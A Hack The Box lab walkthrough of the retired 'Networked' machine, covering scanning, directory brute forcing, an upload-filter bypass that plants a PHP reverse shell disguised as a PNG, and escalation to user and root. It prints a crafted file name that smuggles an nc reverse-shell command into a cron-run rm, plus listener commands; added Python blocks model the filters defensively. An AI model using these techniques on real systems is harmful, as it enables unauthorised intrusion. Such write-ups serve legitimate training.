Welcome to Hack the Box Walkthrough. In this very first walkthrough post, we are going to cover the retired Virtual Machine on Hack The Box, named Networked. Created by guly, ‘Networked’ box is a CentOS box that resides on IP 10.10.10.146. We will be providing you with a detailed step by step guide on how to hack and exploit Networked using penetration testing tools.
A brief introduction about the Networked Walkthrough
Hack The Box (HTB) is a platform where cybersecurity researchers practice their penetration testing skills. The Networked Box on HTB was released on 24 August this year and is quite easy to hack. So, sit back and read this walkthrough from beginning to end and don’t forget to take notes whenever you feel like, that is, if you are not exploiting the box simultaneously.
We’ll need the following hacking tools to crack Networked:
We have set up Kali Linux and are going to use it for this exploit. If you are also using Kali, then you are in luck, because it has all the above mentioned tools pre-installed in it!
Step One: Scanning the network
1. We’ll start with running the network mapper, nmap, to see if any hosts are available or any ports are open. Since the IP is 10.10.10.146, we shall use the following command to run nmap: nmap -sT -sV -T5 10.10.10.146
2. Sweet! Can you see the two open ports, Port 22 and Port 80, in the image above?
3. C’mon, let’s check which website is running on Port 80, shall we?
Okay, this is slightly disappointing. We also checked out the source code of the page but that didn’t light up our faces either.
4. So, let’s see if we can find something worthwhile in the robots.txt file.
The disappointment doesn’t end as you can see in the image above. It’s time to wield another weapon.
Step Two: Finding hidden files
1. We’ll have to look harder to search for gold. It’s time to say hello to DirBuster, the one and only tool for exposing hidden files and directories in a web server. We can either search the menu for the dirbuster app or summon the beast the right way, i.e. by opening the terminal and typing: dirbuster
2. In the DirBuster window, we type the IP address (10.10.10.146). Now, we need a list of words to start the brute force attack. Conveniently, DirBuster comes with many wordlists, out of which we have chosen the basic one: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
3. While DirBuster is doing its job, we go back to the terminal and fire up nikto to assess vulnerabilities in the website. We can see the following flaws discovered in the host.
4. It’s time to check the DirBuster results. Voila! We have found hidden directories and files like photos, uploads, backup etc. (Self high-five)
Step Three: Checking the files
We’ll get started on the files we found on DirBuster. Let’s head to our browser and check what they have in store for us, one by one.
1. The backup folder: Once we open it, we see there is a backup.tar file in the directory. We wonder what’s in there. Let’s download it and find out.
Alright, so this backup file contains all the php files that we had seen in the DirBuster brute force search. This is a good sign, people! We’ll need these later.
2. upload.php: Well, this clearly looks like a place to upload some files.
Let’s get testing. We uploaded a random empty file (abc.txt) to see what happens.
Alright! ‘Invalid image file’ error pops up. Hmmm.. we don’t need to be a Sherlock to figure this one out. Obviously, we’ll need to upload an image file. (Mental note created)
3. Photos.php: Aaahn! Here we can see some images already uploaded by someone. Maybe the image that we are going to put up will also be shown here.
Step Four: Getting ready for the exploit
The plan is to upload a php reverse shell disguised as an image on the upload page. When we open the photos.php page, our code should be executed.
But first, we need to make sure that the image we upload is not rejected. So, we’ll head on to the files we found to see what filters the website uses to check the validity of an image file.
1. Checking the upload.php: Open the backup.tar archive. Open upload.php and find out the validation criteria.
Cool. The website is looking for a .jpg or .png or .gif or .jpeg file. We can do that.
2. Checking the lib.php: Since upload.php requires lib.php as well, we move on to the lib.php code and check that for more criteria.
So, this indicates that the MIME type of the file is also verified. MIME stands for Multipurpose Internet Mail Extensions, and a MIME type describes the contents of a file exchanged over the internet. Cool, we’ll keep this in mind too.
3. Getting the shell: It’s time to fetch the reverse shell.
- We downloaded a reverse shell from the internet.
- Renamed it to reverse-shell.php.png (our original file is called reverse-shell.php)
- Switched the IP address in the file to that of our own.
4. Using BurpSuite: We also need to intercept the traffic, which brings us to our next tool in line, BurpSuite. C’mon! Let’s fire it up!
There’s a proxy which BurpSuite is intercepting. We’ll redirect our browser traffic through that proxy.
- Okay, we click GO and upload the file.
- We can see that the packet has been intercepted by BurpSuite.
- We now press Ctrl + R to send the packet to the repeater.
Can you see in the image above that our filename is “rev-shell.php.png” and content type is image/png? Excellent! This means we have successfully disguised our file.
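For the defender's side of the filters read out of upload.php and lib.php above, here is an added example (not code from the box or from the original post) that puts a model of those checks next to a stricter one. It is narrowed to PNG and assumes the MIME check sniffs only the leading bytes of the content; the function names and both sample inputs are constructed for illustration.

```python
import secrets
import struct
import zlib

PNG_MAGIC = bytes.fromhex("89504e470d0a1a0a")  # fixed 8-byte PNG signature
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}     # extensions the walkthrough lists

def weak_check(filename, data):
    """Model of the filter as described: last extension plus leading bytes."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT and data.startswith(PNG_MAGIC)

def png_well_formed(data):
    """Walk every chunk: IHDR first, each CRC valid, IEND last, nothing after."""
    if not data.startswith(PNG_MAGIC):
        return False
    pos, first = 8, True
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return False
        body, crc = data[pos + 8:end - 4], data[end - 4:end]
        if zlib.crc32(ctype + body) != struct.unpack(">I", crc)[0]:
            return False
        if first and (ctype != b"IHDR" or length != 13):
            return False
        if ctype == b"IEND":
            return end == len(data)
        pos, first = end, False
    return False

def stored_name(filename, data):
    """Hardened path: reject on structure, then discard the client's filename."""
    if not png_well_formed(data):
        return None
    return secrets.token_hex(16) + ".png"

def _chunk(ctype, body):
    crc = struct.pack(">I", zlib.crc32(ctype + body))
    return struct.pack(">I", len(body)) + ctype + body + crc

# Constructed samples: a 1x1 greyscale PNG, and the signature glued onto text.
REAL_PNG = (PNG_MAGIC
            + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
            + _chunk(b"IDAT", zlib.compress(b"\x00\x00"))
            + _chunk(b"IEND", b""))
DISGUISED = PNG_MAGIC + b"<?php /* placeholder, not a payload */ ?>"
```

A structurally valid PNG can still carry arbitrary text inside its chunks, so the structural check only raises the bar; the server-chosen name with a single fixed extension is what keeps an upload from being handled as a script.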
Step Five: Starting the exploit
Now that everything is ready, we are going to execute our plan. (Sinister laugh)
Let’s start with:
1. Uploading the shell: Great! Now we can upload our reverse shell to the server and start deceiving it.
Uh oh! Why is there an “Invalid image file” error?
There’s only one explanation for this: there are some other checks that are being performed on the image file. Well, at least we know that the first eight bytes of a PNG file are 89 50 4E 47 0D 0A 1A 0A, so maybe we can try adding those before the content of the file on BurpSuite, right?
Note: We added 8 spaces before the content, clicked on the hex tab and changed the space values.
We uploaded the shell again and boom! It worked.
2. Executing the code: If everything is right, then as soon as we open photos.php, our reverse shell code shall be executed.
Note: We are going to need an ear to our port in reverse shell (7777) before we do that though. We run this command to start the ncat listener: nc -nlvp 7777
Okay, back to executing the code. Let’s open photos.php and voila! The shell popped open and we are now logged in as apache.
3. Enumerating: Once we do the enumeration, we find some pretty intriguing files in /home/guly. Especially the one called user.txt. (It has the user flag!)
4. Inspecting the files:
- In the file check_attack.php we see that:
– a command nohup /bin/rm -f $path$value > /dev/null 2>&1 & is executed
– the logpath variable is appended by file names in the following directory: /var/www/html/uploads/
- In the file crontab.guly, there is a command that executes the code in the check_attack.php file. This means that when crontab is run, our code is going to be executed with guly privileges.
5. Getting privileges: Here we go! We are creating a file with a malicious name.
- Where are we creating this file? In the upload folder.
- What command are we using? This: cd /var/www/html/uploads/ and this: echo > ";nc your_ip 8888 -c bash"
- Now what do we do? We start listening once again.
- Which command do we use now? This: nc -nlvp 8888
We had to wait for a few minutes after this, but it was worth it! Because we got an ear on 8888. And guess what we heard! We got user privileges. (Digital high-five)
Okay, now we can view the user.txt file since we have the user access. Sweet! We are 50% there.
Once more, after some enumeration, we stumbled upon this script:
Well, when we got to reading it, it turned out that it was modifying a network-script.
Basically, whatever is written after a space in the input is what gets executed. More explanation on this here.
Cool, we shall try this without any delay.
6. Running the script: We run our malicious script using the sudo command that allows us to run a program using privileges of other users. Check out the most commonly used Kali commands.
In sudo, we put our command after space. Here’s how the command looks:
Step Six: Cha ching!
We are now root, my friend!
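Looking back at the check_attack.php step from the defender's side, the added example below (not the box's code and not from the original post) approximates how a POSIX shell splits the quoted rm command once a file name is interpolated into it, and shows a deletion routine that never involves a shell. Only the command string and the uploads path come from the walkthrough; the function names and both file names are constructed, and nothing is executed.

```python
import os
import shlex
import tempfile

# The command string quoted in the walkthrough, with its two variables.
TEMPLATE = "nohup /bin/rm -f {path}{value} > /dev/null 2>&1 &"
UPLOADS = "/var/www/html/uploads/"
SEPARATORS = {";", "&", "&&", "|", "||"}

def shell_commands(path, value):
    """Approximate how a POSIX shell splits the interpolated line into commands."""
    lexer = shlex.shlex(TEMPLATE.format(path=path, value=value),
                        posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands

def safe_delete(directory, name):
    """Delete one directory entry with no shell: the name is only ever data."""
    base = os.path.realpath(directory)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.dirname(target) != base:      # refuse anything outside the directory
        raise ValueError("refusing path outside " + base)
    os.unlink(target)

def demo():
    """Constructed file names in a temporary directory; nothing is executed."""
    names = ["10_10_14_5.png", "; echo constructed-marker"]
    with tempfile.TemporaryDirectory() as uploads:
        for name in names:
            open(os.path.join(uploads, name), "w").close()
        counts = {n: len(shell_commands(UPLOADS, n)) for n in names}
        for name in names:
            safe_delete(uploads, name)
        return counts, os.listdir(uploads)
```

A count above one for a single file name means the name has stopped being an argument to rm and has become a command of its own, which is why a cleanup job like this should delete files through the filesystem API instead of a shell string.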
Woah! This wasn’t that difficult, but we had an exciting time hacking this box. Hope you learned a lot from this Networked Walkthrough. Once you attempt to hack this box, let us know how it went. Do you want to add something to this Networked Walkthrough? Do you have a question to ask? You can head to our hacking forum to ask anything in the community.